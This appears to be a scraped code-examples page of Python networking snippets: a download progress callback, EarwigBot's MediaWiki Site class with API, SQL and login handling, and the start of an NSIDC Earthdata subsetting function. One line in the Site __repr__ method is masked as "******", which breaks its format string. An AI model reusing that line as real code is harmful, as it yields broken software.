            return {"dns": proxy.Proxy}

        Logger.warning("Unsupported Proxy Scheme: %s", proxy.Scheme)
        return None

    def __do_progress_callback(self, progress_callback, retrieved_size,
                               total_size, completed):
        """ Performs a callback, if the progressCallback was specified.

        :param progress_callback:        The callback method
        :param retrieved_size:           Number of bytes retrieved
        :param total_size:               Total number of bytes
        :param completed:               Whether the download has completed.

        :return: True if the download should be cancelled, False otherwise.
        :rtype: bool

        """

        if progress_callback is None:
            # no callback so it was not cancelled
            return False

        # calculate progress and animation values
        self.__animationIndex = (self.__animationIndex + 1) % 4
        bytes_to_mb = 1048576
        animation_frames = ["-", "\\", "|", "/"]
        animation = animation_frames[self.__animationIndex]
        retrievedsize_mb = 1.0 * retrieved_size / bytes_to_mb
        totalsize_mb = 1.0 * total_size / bytes_to_mb
        if total_size > 0:
            percentage = 100.0 * retrieved_size / total_size
        else:
            percentage = 0
        status = '%s - %i%% (%.1f of %.1f MB)' % \
                 (animation, percentage, retrievedsize_mb, totalsize_mb)
        try:
            return progress_callback(retrieved_size, total_size, percentage,
                                     completed, status)
        except:
            Logger.error("Error in Progress Callback", exc_info=True)
            # cancel the download
            return True

    def __str__(self):
        return "UriHandler [id={0}, useCaching={1}, ignoreSslErrors={2}]"\
            .format(self.id, self.cacheStore, self.ignoreSslErrors)
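A minimal sketch of a progress callback compatible with __do_progress_callback above; the parameter order (retrieved_size, total_size, percentage, completed, status) and the cancel-on-True return value are taken from that method, while the function name itself is illustrative:

def print_progress(retrieved_size, total_size, percentage, completed, status):
    # 'status' is the pre-formatted string built by the handler,
    # e.g. "| - 42% (1.3 of 3.1 MB)".
    print(status)
    # Return True to cancel the download, False to let it continue.
    return False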
Example #57
0
    def __init__(self, email="", password=""):
        self.email = email
        self.password = password
        self.cj = CookieJar()
Example #58
0
class Site(object):
    """
    **EarwigBot: Wiki Toolset: Site**

    Represents a site, with support for API queries and returning
    :py:class:`~earwigbot.wiki.page.Page`,
    :py:class:`~earwigbot.wiki.user.User`,
    and :py:class:`~earwigbot.wiki.category.Category` objects. The constructor
    takes a bunch of arguments, but you probably won't need to call it
    directly; :py:meth:`wiki.get_site() <earwigbot.wiki.sitesdb.SitesDB.get_site>`
    for returning :py:class:`Site`
    instances, :py:meth:`wiki.add_site()
    <earwigbot.wiki.sitesdb.SitesDB.add_site>` for adding new ones to our
    database, and :py:meth:`wiki.remove_site()
    <earwigbot.wiki.sitesdb.SitesDB.remove_site>` for removing old ones from
    our database should suffice.

    *Attributes:*

    - :py:attr:`name`:    the site's name (or "wikiid"), like ``"enwiki"``
    - :py:attr:`project`: the site's project name, like ``"wikipedia"``
    - :py:attr:`lang`:    the site's language code, like ``"en"``
    - :py:attr:`domain`:  the site's web domain, like ``"en.wikipedia.org"``
    - :py:attr:`url`:     the site's URL, like ``"https://en.wikipedia.org"``

    *Public methods:*

    - :py:meth:`api_query`:            does an API query with kwargs as params
    - :py:meth:`sql_query`:            does an SQL query and yields its results
    - :py:meth:`get_maxlag`:           returns the internal database lag
    - :py:meth:`get_replag`:           estimates the external database lag
    - :py:meth:`namespace_id_to_name`: returns names associated with an NS id
    - :py:meth:`namespace_name_to_id`: returns the ID associated with a NS name
    - :py:meth:`get_page`:             returns a Page for the given title
    - :py:meth:`get_category`:         returns a Category for the given title
    - :py:meth:`get_user`:             returns a User object for the given name
    - :py:meth:`delegate`:             controls when the API or SQL is used
    """
    SERVICE_API = 1
    SERVICE_SQL = 2

    def __init__(self, name=None, project=None, lang=None, base_url=None,
                 article_path=None, script_path=None, sql=None,
                 namespaces=None, login=(None, None), cookiejar=None,
                 user_agent=None, use_https=False, assert_edit=None,
                 maxlag=None, wait_between_queries=2, logger=None,
                 search_config=None):
        """Constructor for new Site instances.

        This probably isn't necessary to call yourself unless you're building a
        Site that's not in your config and you don't want to add it - normally
        all you need is wiki.get_site(name), which creates the Site for you
        based on your config file and the sites database. We accept a bunch of
        kwargs, but the only ones you really "need" are *base_url* and
        *script_path*; this is enough to figure out an API url. *login*, a
        tuple of (username, password), is highly recommended. *cookiejar* will
        be used to store cookies, and we'll use a normal CookieJar if none is
        given.

        First, we'll store the given arguments as attributes, then set up our
        URL opener. We'll load any of the attributes that weren't given from
        the API, and then log in if a username/pass was given and we aren't
        already logged in.
        """
        # Attributes referring to site information, filled in by an API query
        # if they are missing (and an API url can be determined):
        self._name = name
        self._project = project
        self._lang = lang
        self._base_url = base_url
        self._article_path = article_path
        self._script_path = script_path
        self._namespaces = namespaces

        # Attributes used for API queries:
        self._use_https = use_https
        self._assert_edit = assert_edit
        self._maxlag = maxlag
        self._wait_between_queries = wait_between_queries
        self._max_retries = 6
        self._last_query_time = 0
        self._api_lock = Lock()
        self._api_info_cache = {"maxlag": 0, "lastcheck": 0}

        # Attributes used for SQL queries:
        if sql:
            self._sql_data = sql
        else:
            self._sql_data = {}
        self._sql_conn = None
        self._sql_lock = Lock()
        self._sql_info_cache = {"replag": 0, "lastcheck": 0, "usable": None}

        # Attribute used in copyright violation checks (see CopyrightMixIn):
        if search_config:
            self._search_config = search_config
        else:
            self._search_config = {}

        # Set up cookiejar and URL opener for making API queries:
        if cookiejar is not None:
            self._cookiejar = cookiejar
        else:
            self._cookiejar = CookieJar()
        if not user_agent:
            user_agent = constants.USER_AGENT  # Set default UA
        self._opener = build_opener(HTTPCookieProcessor(self._cookiejar))
        self._opener.addheaders = [("User-Agent", user_agent),
                                   ("Accept-Encoding", "gzip")]

        # Set up our internal logger:
        if logger:
            self._logger = logger
        else:  # Just set up a null logger to eat up our messages:
            self._logger = getLogger("earwigbot.wiki")
            self._logger.addHandler(NullHandler())

        # Get all of the above attributes that were not specified as arguments:
        self._load_attributes()

        # If we have a name/pass and the API says we're not logged in, log in:
        self._login_info = name, password = login
        if name and password:
            logged_in_as = self._get_username_from_cookies()
            if not logged_in_as or name.replace("_", " ") != logged_in_as:
                self._login(login)

    def __repr__(self):
        """Return the canonical string representation of the Site."""
        res = ", ".join((
            "Site(name={_name!r}", "project={_project!r}", "lang={_lang!r}",
            "base_url={_base_url!r}", "article_path={_article_path!r}",
            "script_path={_script_path!r}", "use_https={_use_https!r}",
            "assert_edit={_assert_edit!r}", "maxlag={_maxlag!r}",
            "sql={_sql_data!r}", "login={0}", "user_agent={2!r}",
            "cookiejar={1})"))
        name, password = self._login_info
        login = "******".format(repr(name), "hidden" if password else None)
        cookies = self._cookiejar.__class__.__name__
        if hasattr(self._cookiejar, "filename"):
            cookies += "({0!r})".format(getattr(self._cookiejar, "filename"))
        else:
            cookies += "()"
        agent = self._opener.addheaders[0][1]
        return res.format(login, cookies, agent, **self.__dict__)

    def __str__(self):
        """Return a nice string representation of the Site."""
        res = "<Site {0} ({1}:{2}) at {3}>"
        return res.format(self.name, self.project, self.lang, self.domain)

    def _unicodeify(self, value, encoding="utf8"):
        """Return input as unicode if it's not unicode to begin with."""
        if isinstance(value, unicode):
            return value
        return unicode(value, encoding)

    def _urlencode_utf8(self, params):
        """Implement urllib.urlencode() with support for unicode input."""
        enc = lambda s: s.encode("utf8") if isinstance(s, unicode) else str(s)
        args = []
        for key, val in params.iteritems():
            key = quote_plus(enc(key))
            val = quote_plus(enc(val))
            args.append(key + "=" + val)
        return "&".join(args)

    def _api_query(self, params, tries=0, wait=5, ignore_maxlag=False):
        """Do an API query with *params* as a dict of parameters.

        See the documentation for :py:meth:`api_query` for full implementation
        details.
        """
        since_last_query = time() - self._last_query_time  # Throttling support
        if since_last_query < self._wait_between_queries:
            wait_time = self._wait_between_queries - since_last_query
            log = "Throttled: waiting {0} seconds".format(round(wait_time, 2))
            self._logger.debug(log)
            sleep(wait_time)
        self._last_query_time = time()

        url, data = self._build_api_query(params, ignore_maxlag)
        if "lgpassword" in params:
            self._logger.debug("{0} -> <hidden>".format(url))
        else:
            self._logger.debug("{0} -> {1}".format(url, data))

        try:
            response = self._opener.open(url, data)
        except URLError as error:
            if hasattr(error, "reason"):
                e = "API query failed: {0}.".format(error.reason)
            elif hasattr(error, "code"):
                e = "API query failed: got an error code of {0}."
                e = e.format(error.code)
            else:
                e = "API query failed."
            raise exceptions.APIError(e)

        result = response.read()
        if response.headers.get("Content-Encoding") == "gzip":
            stream = StringIO(result)
            gzipper = GzipFile(fileobj=stream)
            result = gzipper.read()

        return self._handle_api_query_result(result, params, tries, wait)

    def _build_api_query(self, params, ignore_maxlag):
        """Given API query params, return the URL to query and POST data."""
        if not self._base_url or self._script_path is None:
            e = "Tried to do an API query, but no API URL is known."
            raise exceptions.APIError(e)

        url = ''.join((self.url, self._script_path, "/api.php"))
        params["format"] = "json"  # This is the only format we understand
        if self._assert_edit:  # If requested, ensure that we're logged in
            params["assert"] = self._assert_edit
        if self._maxlag and not ignore_maxlag:
            # If requested, don't overload the servers:
            params["maxlag"] = self._maxlag

        data = self._urlencode_utf8(params)
        return url, data

    def _handle_api_query_result(self, result, params, tries, wait):
        """Given the result of an API query, attempt to return useful data."""
        try:
            res = loads(result)  # Try to parse as a JSON object
        except ValueError:
            e = "API query failed: JSON could not be decoded."
            raise exceptions.APIError(e)

        try:
            code = res["error"]["code"]
            info = res["error"]["info"]
        except (TypeError, KeyError):  # Having these keys indicates a problem
            return res  # All is well; return the decoded JSON

        if code == "maxlag":  # We've been throttled by the server
            if tries >= self._max_retries:
                e = "Maximum number of retries reached ({0})."
                raise exceptions.APIError(e.format(self._max_retries))
            tries += 1
            msg = 'Server says "{0}"; retrying in {1} seconds ({2}/{3})'
            self._logger.info(msg.format(info, wait, tries, self._max_retries))
            sleep(wait)
            return self._api_query(params, tries=tries, wait=wait*2)
        else:  # Some unknown error occurred
            e = 'API query failed: got error "{0}"; server says: "{1}".'
            error = exceptions.APIError(e.format(code, info))
            error.code, error.info = code, info
            raise error

    def _load_attributes(self, force=False):
        """Load data about our Site from the API.

        This function is called by __init__() when one of the site attributes
        was not given as a keyword argument. We'll do an API query to get the
        missing data, but only if there actually *is* missing data.

        Additionally, you can call this with *force* set to True to forcibly
        reload all attributes.
        """
        # All attributes to be loaded, except _namespaces, which is a special
        # case because it requires additional params in the API query:
        attrs = [self._name, self._project, self._lang, self._base_url,
            self._article_path, self._script_path]

        params = {"action": "query", "meta": "siteinfo", "siprop": "general"}

        if not self._namespaces or force:
            params["siprop"] += "|namespaces|namespacealiases"
            result = self.api_query(**params)
            self._load_namespaces(result)
        elif all(attrs):  # Everything is already specified and we're not told
            return        # to force a reload, so do nothing
        else:  # We're only loading attributes other than _namespaces
            result = self.api_query(**params)

        res = result["query"]["general"]
        self._name = res["wikiid"]
        self._project = res["sitename"].lower()
        self._lang = res["lang"]
        self._base_url = res["server"]
        self._article_path = res["articlepath"]
        self._script_path = res["scriptpath"]

    def _load_namespaces(self, result):
        """Fill self._namespaces with a dict of namespace IDs and names.

        Called by _load_attributes() with API data as *result* when
        self._namespaces was not given as a kwarg to __init__().
        """
        self._namespaces = {}

        for namespace in result["query"]["namespaces"].values():
            ns_id = namespace["id"]
            name = namespace["*"]
            try:
                canonical = namespace["canonical"]
            except KeyError:
                self._namespaces[ns_id] = [name]
            else:
                if name != canonical:
                    self._namespaces[ns_id] = [name, canonical]
                else:
                    self._namespaces[ns_id] = [name]

        for namespace in result["query"]["namespacealiases"]:
            ns_id = namespace["id"]
            alias = namespace["*"]
            self._namespaces[ns_id].append(alias)

    def _get_cookie(self, name, domain):
        """Return the named cookie unless it is expired or doesn't exist."""
        for cookie in self._cookiejar:
            if cookie.name == name and cookie.domain == domain:
                if cookie.is_expired():
                    break
                return cookie

    def _get_username_from_cookies(self):
        """Try to return our username based solely on cookies.

        First, we'll look for a cookie named self._name + "Token", like
        "enwikiToken". If it exists and isn't expired, we'll assume it's valid
        and try to return the value of the cookie self._name + "UserName" (like
        "enwikiUserName"). This should work fine on wikis without single-user
        login.

        If `enwikiToken` doesn't exist, we'll try to find a cookie named
        `centralauth_Token`. If this exists and is not expired, we'll try to
        return the value of `centralauth_User`.

        If we didn't get any matches, we'll return None. Our goal here isn't to
        return the most likely username, or what we *want* our username to be
        (for that, we'd do self._login_info[0]), but rather to get our current
        username without an unnecessary ?action=query&meta=userinfo API query.
        """
        name = ''.join((self._name, "Token"))
        cookie = self._get_cookie(name, self.domain)

        if cookie:
            name = ''.join((self._name, "UserName"))
            user_name = self._get_cookie(name, self.domain)
            if user_name:
                return unquote_plus(user_name.value)

        for cookie in self._cookiejar:
            if cookie.name != "centralauth_Token" or cookie.is_expired():
                continue
            base = cookie.domain
            if base.startswith(".") and not cookie.domain_initial_dot:
                base = base[1:]
            if self.domain.endswith(base):
                user_name = self._get_cookie("centralauth_User", cookie.domain)
                if user_name:
                    return unquote_plus(user_name.value)

    def _get_username_from_api(self):
        """Do a simple API query to get our username and return it.

        This is a reliable way to make sure we are actually logged in, because
        it doesn't deal with annoying cookie logic, but it results in an API
        query that is unnecessary in some cases.

        Called by _get_username() (in turn called by get_user() with no
        username argument) when cookie lookup fails, probably indicating that
        we are logged out.
        """
        result = self.api_query(action="query", meta="userinfo")
        return result["query"]["userinfo"]["name"]

    def _get_username(self):
        """Return the name of the current user, whether logged in or not.

        First, we'll try to deduce it solely from cookies, to avoid an
        unnecessary API query. For the cookie-detection method, see
        _get_username_from_cookies()'s docs.

        If our username isn't in cookies, then we're probably not logged in, or
        something fishy is going on (like forced logout). In this case, do a
        single API query for our username (or IP address) and return that.
        """
        name = self._get_username_from_cookies()
        if name:
            return name
        return self._get_username_from_api()

    def _save_cookiejar(self):
        """Try to save our cookiejar after doing a (normal) login or logout.

        Calls the standard .save() method with no filename. Don't fret if our
        cookiejar doesn't support saving (CookieJar raises AttributeError,
        FileCookieJar raises NotImplementedError) or no default filename was
        given (LWPCookieJar and MozillaCookieJar raise ValueError).
        """
        if hasattr(self._cookiejar, "save"):
            try:
                getattr(self._cookiejar, "save")()
            except (NotImplementedError, ValueError):
                pass

    def _login(self, login, token=None, attempt=0):
        """Safely login through the API.

        Normally, this is called by __init__() if a username and password have
        been provided and no valid login cookies were found. The only other
        time it needs to be called is when those cookies expire, which is done
        automatically by api_query() if a query fails.

        Recent versions of MediaWiki's API have fixed a CSRF vulnerability,
        requiring login to be done in two separate requests. If the response
        from our initial request is "NeedToken", we'll do another one with
        the token. If login is successful, we'll try to save our cookiejar.

        Raises LoginError on login errors (duh), like bad passwords and
        nonexistent usernames.

        *login* is a (username, password) tuple. *token* is the token returned
        from our first request, and *attempt* is to prevent getting stuck in a
        loop if MediaWiki isn't acting right.
        """
        name, password = login
        if token:
            result = self.api_query(action="login", lgname=name,
                                    lgpassword=password, lgtoken=token)
        else:
            result = self.api_query(action="login", lgname=name,
                                    lgpassword=password)

        res = result["login"]["result"]
        if res == "Success":
            self._save_cookiejar()
        elif res == "NeedToken" and attempt == 0:
            token = result["login"]["token"]
            return self._login(login, token, attempt=1)
        else:
            if res == "Illegal":
                e = "The provided username is illegal."
            elif res == "NotExists":
                e = "The provided username does not exist."
            elif res == "EmptyPass":
                e = "No password was given."
            elif res == "WrongPass" or res == "WrongPluginPass":
                e = "The given password is incorrect."
            else:
                e = "Couldn't login; server says '{0}'.".format(res)
            raise exceptions.LoginError(e)

    def _logout(self):
        """Safely logout through the API.

        We'll do a simple API request (api.php?action=logout), clear our
        cookiejar (which probably contains now-invalidated cookies) and try to
        save it, if it supports that sort of thing.
        """
        self.api_query(action="logout")
        self._cookiejar.clear()
        self._save_cookiejar()

    def _sql_connect(self, **kwargs):
        """Attempt to establish a connection with this site's SQL database.

        oursql.connect() will be called with self._sql_data as its kwargs.
        Any kwargs given to this function will be passed to connect() and will
        have precedence over the config file.

        Will raise SQLError() if the module "oursql" is not available. oursql
        may raise its own exceptions (e.g. oursql.InterfaceError) if it cannot
        establish a connection.
        """
        if not oursql:
            e = "Module 'oursql' is required for SQL queries."
            raise exceptions.SQLError(e)

        args = self._sql_data
        for key, value in kwargs.iteritems():
            args[key] = value

        if "read_default_file" not in args and "user" not in args and "passwd" not in args:
            args["read_default_file"] = expanduser("~/.my.cnf")

        if "autoping" not in args:
            args["autoping"] = True

        if "autoreconnect" not in args:
            args["autoreconnect"] = True

        self._sql_conn = oursql.connect(**args)

    def _get_service_order(self):
        """Return a preferred order for using services (e.g. the API and SQL).

        A list is returned, starting with the most preferred service first and
        ending with the least preferred one. Currently, there are only two
        services. SERVICE_API will always be included since the API is expected
        to be always usable. In normal circumstances, self.SERVICE_SQL will be
        first (with the API second), since using SQL directly is easier on the
        servers than making web queries with the API. self.SERVICE_SQL will be
        second if replag is greater than five minutes (a cached value updated
        every two minutes at most), *unless* API lag is also very high.
        self.SERVICE_SQL will not be included in the list if we cannot form a
        proper SQL connection.
        """
        now = time()
        if now - self._sql_info_cache["lastcheck"] > 120:
            self._sql_info_cache["lastcheck"] = now
            try:
                self._sql_info_cache["replag"] = sqllag = self.get_replag()
            except (exceptions.SQLError, oursql.Error):
                self._sql_info_cache["usable"] = False
                return [self.SERVICE_API]
            self._sql_info_cache["usable"] = True
        else:
            if not self._sql_info_cache["usable"]:
                return [self.SERVICE_API]
            sqllag = self._sql_info_cache["replag"]

        if sqllag > 300:
            if not self._maxlag:
                return [self.SERVICE_API, self.SERVICE_SQL]
            if now - self._api_info_cache["lastcheck"] > 300:
                self._api_info_cache["lastcheck"] = now
                try:
                    self._api_info_cache["maxlag"] = apilag = self.get_maxlag()
                except exceptions.APIError:
                    self._api_info_cache["maxlag"] = apilag = 0
            else:
                apilag = self._api_info_cache["maxlag"]
            if apilag > self._maxlag:
                return [self.SERVICE_SQL, self.SERVICE_API]
            return [self.SERVICE_API, self.SERVICE_SQL]

        return [self.SERVICE_SQL, self.SERVICE_API]

    @property
    def name(self):
        """The Site's name (or "wikiid" in the API), like ``"enwiki"``."""
        return self._name

    @property
    def project(self):
        """The Site's project name in lowercase, like ``"wikipedia"``."""
        return self._project

    @property
    def lang(self):
        """The Site's language code, like ``"en"`` or ``"es"``."""
        return self._lang

    @property
    def domain(self):
        """The Site's web domain, like ``"en.wikipedia.org"``."""
        return urlparse(self._base_url).netloc

    @property
    def url(self):
        """The Site's full base URL, like ``"https://en.wikipedia.org"``."""
        url = self._base_url
        if url.startswith("//"):  # Protocol-relative URLs from 1.18
            if self._use_https:
                url = "https:" + url
            else:
                url = "http:" + url
        return url

    def api_query(self, **kwargs):
        """Do an API query with `kwargs` as the parameters.

        This will first attempt to construct an API url from
        :py:attr:`self._base_url` and :py:attr:`self._script_path`. We need
        both of these, or else we'll raise
        :py:exc:`~earwigbot.exceptions.APIError`. If
        :py:attr:`self._base_url` is protocol-relative (introduced in MediaWiki
        1.18), we'll choose HTTPS only if :py:attr:`self._use_https` is
        ``True``, otherwise HTTP.

        We'll encode the given params, adding ``format=json`` along the way, as
        well as ``&assert=`` and ``&maxlag=`` based on
        :py:attr:`self._assert_edit` and :py:attr:`_maxlag` respectively.
        Additionally, we'll sleep a bit if the last query was made fewer than
        :py:attr:`self._wait_between_queries` seconds ago. The request is made
        through :py:attr:`self._opener`, which has cookie support
        (:py:attr:`self._cookiejar`), a ``User-Agent``
        (:py:const:`earwigbot.wiki.constants.USER_AGENT`), and
        ``Accept-Encoding`` set to ``"gzip"``.

        Assuming everything went well, we'll gunzip the data (if compressed),
        load it as a JSON object, and return it.

        If our request failed for some reason, we'll raise
        :py:exc:`~earwigbot.exceptions.APIError` with details. If that
        reason was due to maxlag, we'll sleep for a bit and then repeat the
        query until we exceed :py:attr:`self._max_retries`.

        There is helpful MediaWiki API documentation at `MediaWiki.org
        <http://www.mediawiki.org/wiki/API>`_.
        """
        with self._api_lock:
            return self._api_query(kwargs)

    def sql_query(self, query, params=(), plain_query=False, dict_cursor=False,
                  cursor_class=None, show_table=False):
        """Do an SQL query and yield its results.

        If *plain_query* is ``True``, we will force an unparameterized query.
        Specifying both *params* and *plain_query* will cause an error. If
        *dict_cursor* is ``True``, we will use :py:class:`oursql.DictCursor` as
        our cursor, otherwise the default :py:class:`oursql.Cursor`. If
        *cursor_class* is given, it will override this option. If *show_table*
        is True, the name of the table will be prepended to the name of the
        column. This will mainly affect an :py:class:`~oursql.DictCursor`.

        Example usage::

            >>> query = "SELECT user_id, user_registration FROM user WHERE user_name = ?"
            >>> params = ("The Earwig",)
            >>> result1 = site.sql_query(query, params)
            >>> result2 = site.sql_query(query, params, dict_cursor=True)
            >>> for row in result1: print row
            (7418060L, '20080703215134')
            >>> for row in result2: print row
            {'user_id': 7418060L, 'user_registration': '20080703215134'}

        This may raise :py:exc:`~earwigbot.exceptions.SQLError` or one of
        oursql's exceptions (:py:exc:`oursql.ProgrammingError`,
        :py:exc:`oursql.InterfaceError`, ...) if there were problems with the
        query.

        See :py:meth:`_sql_connect` for information on how a connection is
        acquired. Also relevant is `oursql's documentation
        <http://packages.python.org/oursql>`_ for details on that package.
        """
        if not cursor_class:
            if dict_cursor:
                cursor_class = oursql.DictCursor
            else:
                cursor_class = oursql.Cursor
        klass = cursor_class

        with self._sql_lock:
            if not self._sql_conn:
                self._sql_connect()
            with self._sql_conn.cursor(klass, show_table=show_table) as cur:
                cur.execute(query, params, plain_query)
                for result in cur:
                    yield result

    def get_maxlag(self, showall=False):
        """Return the internal database replication lag in seconds.

        In a typical setup, this function returns the replication lag *within*
        the WMF's cluster, *not* external replication lag affecting the
        Toolserver (see :py:meth:`get_replag` for that). This is useful when
        combined with the ``maxlag`` API query param (added by config), in
        which queries will be halted and retried if the lag is too high,
        usually above five seconds.

        With *showall*, will return a list of the lag for all servers in the
        cluster, not just the one with the highest lag.
        """
        params = {"action": "query", "meta": "siteinfo", "siprop": "dbrepllag"}
        if showall:
            params["sishowalldb"] = 1
        with self._api_lock:
            result = self._api_query(params, ignore_maxlag=True)
        if showall:
            return [server["lag"] for server in result["query"]["dbrepllag"]]
        return result["query"]["dbrepllag"][0]["lag"]

    def get_replag(self):
        """Return the estimated external database replication lag in seconds.

        Requires SQL access. This function only makes sense on a replicated
        database (e.g. the Wikimedia Toolserver) and on a wiki that receives a
        large number of edits (ideally, at least one per second), or the result
        may be larger than expected, since it works by subtracting the current
        time from the timestamp of the latest recent changes event.

        This may raise :py:exc:`~earwigbot.exceptions.SQLError` or one of
        oursql's exceptions (:py:exc:`oursql.ProgrammingError`,
        :py:exc:`oursql.InterfaceError`, ...) if there were problems.
        """
        query = """SELECT UNIX_TIMESTAMP() - UNIX_TIMESTAMP(rc_timestamp) FROM
                   recentchanges ORDER BY rc_timestamp DESC LIMIT 1"""
        result = list(self.sql_query(query))
        return result[0][0]

    def namespace_id_to_name(self, ns_id, all=False):
        """Given a namespace ID, returns associated namespace names.

        If *all* is ``False`` (default), we'll return the first name in the
        list, which is usually the localized version. Otherwise, we'll return
        the entire list, which includes the canonical name. For example, this
        returns ``u"Wikipedia"`` if *ns_id* = ``4`` and *all* is ``False`` on
        ``enwiki``; returns ``[u"Wikipedia", u"Project", u"WP"]`` if *ns_id* =
        ``4`` and *all* is ``True``.

        Raises :py:exc:`~earwigbot.exceptions.NamespaceNotFoundError` if the ID
        is not found.
        """
        try:
            if all:
                return self._namespaces[ns_id]
            else:
                return self._namespaces[ns_id][0]
        except KeyError:
            e = "There is no namespace with id {0}.".format(ns_id)
            raise exceptions.NamespaceNotFoundError(e)

    def namespace_name_to_id(self, name):
        """Given a namespace name, returns the associated ID.

        Like :py:meth:`namespace_id_to_name`, but reversed. Case is ignored,
        because namespaces are assumed to be case-insensitive.

        Raises :py:exc:`~earwigbot.exceptions.NamespaceNotFoundError` if the
        name is not found.
        """
        lname = name.lower()
        for ns_id, names in self._namespaces.items():
            lnames = [n.lower() for n in names]  # Be case-insensitive
            if lname in lnames:
                return ns_id

        e = "There is no namespace with name '{0}'.".format(name)
        raise exceptions.NamespaceNotFoundError(e)

    def get_page(self, title, follow_redirects=False, pageid=None):
        """Return a :py:class:`Page` object for the given title.

        *follow_redirects* is passed directly to
        :py:class:`~earwigbot.wiki.page.Page`'s constructor. Also, this will
        return a :py:class:`~earwigbot.wiki.category.Category` object instead
        if the given title is in the category namespace. As
        :py:class:`~earwigbot.wiki.category.Category` is a subclass of
        :py:class:`~earwigbot.wiki.page.Page`, this should not cause problems.

        Note that this doesn't do any direct checks for existence or
        redirect-following: :py:class:`~earwigbot.wiki.page.Page`'s methods
        provide that.
        """
        title = self._unicodeify(title)
        prefixes = self.namespace_id_to_name(constants.NS_CATEGORY, all=True)
        prefix = title.split(":", 1)[0]
        if prefix != title:  # Avoid a page that is simply "Category"
            if prefix in prefixes:
                return Category(self, title, follow_redirects, pageid,
                                self._logger)
        return Page(self, title, follow_redirects, pageid, self._logger)

    def get_category(self, catname, follow_redirects=False, pageid=None):
        """Return a :py:class:`Category` object for the given category name.

        *catname* should be given *without* a namespace prefix. This method is
        really just shorthand for :py:meth:`get_page("Category:" + catname)
        <get_page>`.
        """
        catname = self._unicodeify(catname)
        prefix = self.namespace_id_to_name(constants.NS_CATEGORY)
        pagename = u':'.join((prefix, catname))
        return Category(self, pagename, follow_redirects, pageid, self._logger)

    def get_user(self, username=None):
        """Return a :py:class:`User` object for the given username.

        If *username* is left as ``None``, then a
        :py:class:`~earwigbot.wiki.user.User` object representing the currently
        logged-in (or anonymous!) user is returned.
        """
        if username:
            username = self._unicodeify(username)
        else:
            username = self._get_username()
        return User(self, username, self._logger)

    def delegate(self, services, args=None, kwargs=None):
        """Delegate a task to either the API or SQL depending on conditions.

        *services* should be a dictionary in which the key is the service name
        (:py:attr:`self.SERVICE_API <SERVICE_API>` or
        :py:attr:`self.SERVICE_SQL <SERVICE_SQL>`), and the value is the
        function to call for this service. All functions will be passed the
        same arguments the tuple *args* and the dict **kwargs**, which are both
        empty by default. The service order is determined by
        :py:meth:`_get_service_order`.

        Not every service needs an entry in the dictionary. Will raise
        :py:exc:`~earwigbot.exceptions.NoServiceError` if an appropriate
        service cannot be found.
        """
        if not args:
            args = ()
        if not kwargs:
            kwargs = {}

        order = self._get_service_order()
        for srv in order:
            if srv in services:
                try:
                    return services[srv](*args, **kwargs)
                except exceptions.ServiceError:
                    continue
        raise exceptions.NoServiceError(services)
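A hedged usage sketch for the Site class above, assuming it is importable from earwigbot.wiki.site; per the constructor docstring, base_url and script_path are enough to derive an API URL, and api_query() returns the decoded JSON response. Note that constructing the Site performs live API requests:

from earwigbot.wiki.site import Site

# Enough to derive the API URL https://en.wikipedia.org/w/api.php
site = Site(base_url="https://en.wikipedia.org", script_path="/w")

# Encodes the params, adds format=json, and returns the parsed JSON result.
result = site.api_query(action="query", meta="userinfo")
print(result["query"]["userinfo"]["name"])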
Example #59
0
def nsidc_subset_altimetry(filepath, PRODUCT, VERSION, USER='', PASSWORD='',
    BBOX=None, POLYGON=None, TIME=None, FORMAT=None, MODE=None, CLOBBER=False,
    VERBOSE=False, UNZIP=False):

    #-- https://docs.python.org/3/howto/urllib2.html#id5
    #-- create a password manager
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    #-- Add the username and password for NASA Earthdata Login system
    password_mgr.add_password(None, 'https://urs.earthdata.nasa.gov',
        USER, PASSWORD)
    #-- Encode username/password for request authorization headers
    base64_string = base64.b64encode('{0}:{1}'.format(USER,PASSWORD).encode())
    #-- Create cookie jar for storing cookies. This is used to store and return
    #-- the session cookie given to use by the data server (otherwise will just
    #-- keep sending us back to Earthdata Login to authenticate).
    cookie_jar = CookieJar()
    #-- create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(
        urllib2.HTTPBasicAuthHandler(password_mgr),
        urllib2.HTTPSHandler(context=ssl.SSLContext()),
        urllib2.HTTPCookieProcessor(cookie_jar))
    #-- add Authorization header to opener
    authorization_header = "Basic {0}".format(base64_string.decode())
    opener.addheaders = [("Authorization", authorization_header)]
    #-- Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)
    #-- All calls to urllib2.urlopen will now use handler
    #-- Make sure not to include the protocol in with the URL, or
    #-- HTTPPasswordMgrWithDefaultRealm will be confused.

    #-- compile lxml xml parser
    parser = lxml.etree.XMLParser(recover=True, remove_blank_text=True)

    #-- product and version flags
    product_flag = '?short_name={0}'.format(PRODUCT)
    version_flag = '&version={0}'.format(VERSION) if VERSION else ''

    #-- if using time start and end to temporally subset data
    if TIME:
        #-- verify that start and end times are in ISO format
        start_time = dateutil.parser.parse(TIME[0]).isoformat()
        end_time = dateutil.parser.parse(TIME[1]).isoformat()
        time_flag = '&time={0},{1}'.format(start_time, end_time)
        temporal_flag = '&temporal={0},{1}'.format(start_time, end_time)
    else:
        time_flag = ''
        temporal_flag = ''

    #-- spatially subset data using bounding box or polygon file
    if BBOX:
        #-- if using a bounding box to spatially subset data
        #-- min_lon,min_lat,max_lon,max_lat
        bounds_flag = '&bounding_box={0:f},{1:f},{2:f},{3:f}'.format(*BBOX)
        spatial_flag = '&bbox={0:f},{1:f},{2:f},{3:f}'.format(*BBOX)
    elif POLYGON:
        #-- read shapefile or kml/kmz file
        fileBasename,fileExtension = os.path.splitext(POLYGON)
        #-- extract file name and subsetter indices lists
        match_object = re.match('(.*?)(\[(.*?)\])?$',POLYGON)
        FILE = os.path.expanduser(match_object.group(1))
        #-- read specific variables of interest
        v = match_object.group(3).split(',') if match_object.group(2) else None
        #-- get MultiPolygon object from input spatial file
        if fileExtension in ('.shp','.zip'):
            #-- if reading a shapefile or a zipped directory with a shapefile
            ZIP = (fileExtension == '.zip')
            m = read_shapefile(os.path.expanduser(FILE), VARIABLES=v, ZIP=ZIP)
        elif fileExtension in ('.kml','.kmz'):
            #-- if reading a keyhole markup language (can be compressed)
            KMZ = (fileExtension == '.kmz')
            m = read_kml_file(os.path.expanduser(FILE), VARIABLES=v, KMZ=KMZ)
        elif fileExtension in ('.json','.geojson'):
            #-- if reading a GeoJSON file
